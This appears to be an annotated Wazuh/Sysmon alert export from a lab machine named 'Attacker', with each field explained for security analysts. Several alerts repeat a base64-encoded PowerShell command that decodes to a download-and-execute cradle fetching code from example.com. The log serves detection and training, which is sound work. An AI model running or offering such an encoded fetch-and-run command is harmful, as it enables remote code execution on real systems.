data.win.system.processID:  3712
PID of the process that logged the event, i.e. the Sysmon service (3712 on this host), not the process being reported. The reported process is data.win.eventdata.processId.

data.win.system.threadID:  4740
Thread inside the Sysmon service that wrote the record. Not useful for triage.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
Event log channel the record was read from. Microsoft-Windows-Sysmon/Operational is the Sysmon log; open it in Event Viewer or with wevtutil when you need the original XML.

data.win.system.computer:  Attacker
Hostname Windows wrote into the event. Should equal agent.name (it does: Attacker); a mismatch means a forwarded log or a renamed host.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:44.004 ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} ProcessId: 9224 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c16d-680a-df0c-000000000e00} ParentProcessId: 9948 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:44.004
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c170-680a-e10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c16d-680a-df0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9948
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:47.451+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:47.451+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  122
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535347.2727295
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:45.3706619Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350393
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:45.357 ProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} ProcessId: 9224 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_2wwl0blf.ude.ps1 CreationUtcTime: 2025-04-24 22:55:45.355 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:45.357
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c170-680a-e10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  9224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_2wwl0blf.ude.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:45.355
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:52.666+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:52.666+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  119
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535352.2730060
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:49.9714983Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350420
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:55:46.414 ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} ProcessId: 8356 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c170-680a-e10c-000000000e00} ParentProcessId: 9224 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:46.414
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c172-680a-e30c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c170-680a-e10c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  9224
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:52.720+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:52.720+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  123
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535352.2738123
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:50.2371884Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350424
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:55:50.233 ProcessGuid: {94294ddc-c172-680a-e30c-000000000e00} ProcessId: 8356 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_keqzo4et.k23.ps1 CreationUtcTime: 2025-04-24 22:55:50.233 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:55:50.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c172-680a-e30c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  8356
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_keqzo4et.k23.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:55:50.233
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:55:56.768+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:55:56.768+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  120
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535356.2740888
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:55:54.0942354Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350473
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
